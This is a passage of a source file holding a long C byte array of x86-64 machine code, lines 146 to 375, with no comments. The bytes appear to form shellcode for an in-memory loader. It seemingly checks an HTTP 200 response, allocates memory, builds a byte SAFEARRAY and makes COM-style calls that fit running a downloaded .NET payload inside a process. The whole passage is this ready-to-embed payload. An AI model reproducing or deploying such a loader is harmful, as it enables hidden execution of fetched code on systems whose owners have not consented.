146 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80,
147 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
148 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00,
149 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
150 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
151 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00,
152 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
153 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
154 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
155 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00,
156 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00,
157 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
158 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00,
159 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02,
160 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d,
161 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0,
162 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02,
163 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00,
164 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48,
165 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00,
166 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00,
167 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02,
168 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95,
169 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48,
170 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba,
171 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00,
172 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
173 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
174 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
175 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07,
176 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
177 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
178 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07,
179 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
180 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38,
181 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
182 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
183 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41,
184 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92,
185 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48,
186 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0,
187 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
188 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b,
189 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
190 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00,
191 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
192 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00,
193 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1,
194 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99,
195 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
196 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00,
197 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07,
198 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90,
199 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48,
200 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00,
201 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35,
202 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
203 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
204 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48,
205 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00,
206 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40,
207 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06,
208 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00,
209 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48,
210 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00,
211 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
212 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10,
213 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89,
214 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48,
215 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48,
216 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7,
217 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01,
218 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81,
219 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
220 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
221 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48,
222 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55,
223 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
224 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04,
225 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0,
226 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45,
227 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50,
228 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4,
229 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b,
230 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
231 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55,
232 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
233 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c,
234 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c,
235 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45,
236 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48,
237 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d,
238 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10,
239 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48,
240 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b,
241 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54,
242 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00,
243 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
244 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
245 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02,
246 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
247 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b,
248 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
249 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
250 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48,
251 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
252 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
253 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
254 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b,
255 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff,
256 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8,
257 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0,
258 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b,
259 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00,
260 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10,
261 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
262 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
263 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc,
264 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10,
265 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
266 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0,
267 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0,
268 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb,
269 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
270 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20,
271 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48,
272 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19,
273 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48,
274 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39,
275 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
276 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
277 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a,
278 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
279 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7,
280 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b,
281 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48,
282 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b,
283 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b,
284 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00,
285 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b,
286 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2,
287 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
288 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45,
289 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
290 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
291 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00,
292 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
293 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
294 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18,
295 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00,
296 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
297 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
298 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
299 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
300 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
301 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00,
302 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00,
303 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28,
304 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
305 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95,
306 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff,
307 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
308 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
309 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b,
310 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
311 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff,
312 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
313 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
314 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b,
315 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0,
316 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
317 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8,
318 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d,
319 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0,
320 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0,
321 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00,
322 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01,
323 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
324 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
325 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
326 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00,
327 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00,
328 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0,
329 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
330 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41,
331 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00,
332 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
333 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
334 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
335 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2,
336 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48,
337 0x8b, 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x01, 0xca, 0x48, 0x83, 0xc2,
338 0x08, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0xc1, 0x48, 0x8b, 0x45,
339 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xff,
340 0xd3, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xec, 0x48, 0x8b,
341 0x85, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x90, 0x04, 0x08, 0x00, 0x00, 0x8b,
342 0x45, 0xec, 0x39, 0xc2, 0x77, 0x91, 0xeb, 0x69, 0x66, 0xc7, 0x45, 0x30,
343 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
344 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
345 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
346 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
347 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x98, 0x90, 0x00, 0x00, 0x00, 0x48,
348 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00,
349 0x00, 0x48, 0x8d, 0x55, 0xea, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89,
350 0xc1, 0x48, 0x8b, 0x45, 0x38, 0x48, 0x8d, 0x55, 0xec, 0x49, 0x89, 0xc8,
351 0x48, 0x89, 0xc1, 0xff, 0xd3, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00,
352 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x90, 0x00,
353 0x00, 0x00, 0x4c, 0x8d, 0x45, 0x30, 0x48, 0x8d, 0x55, 0xec, 0x48, 0x8b,
354 0x8d, 0xb8, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x66, 0xc7, 0x45, 0x10, 0x01,
355 0x00, 0x48, 0xc7, 0x45, 0x18, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85,
356 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48,
357 0x8b, 0x80, 0x28, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00,
358 0x00, 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x55,
359 0xc0, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x89, 0x55, 0xc8, 0x48, 0x8b, 0x55,
360 0x20, 0x48, 0x89, 0x55, 0xd0, 0x4c, 0x8d, 0x4d, 0xf0, 0x4c, 0x8b, 0x85,
361 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc0, 0xff, 0xd0, 0x89, 0x85,
362 0xac, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xb8, 0x00, 0x00, 0x00, 0x00,
363 0x0f, 0x84, 0xf3, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
364 0x00, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x38,
365 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
366 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb8, 0x00,
367 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0xe9, 0xbd, 0x02, 0x00, 0x00,
368 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x40, 0x38, 0x00,
369 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
370 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
371 0x95, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x04, 0x04, 0x00, 0x00,
372 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00,
373 0x48, 0x83, 0xbd, 0xa0, 0x00, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00,
374 0x00, 0x00, 0x00, 0xe9, 0x72, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
375 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b,
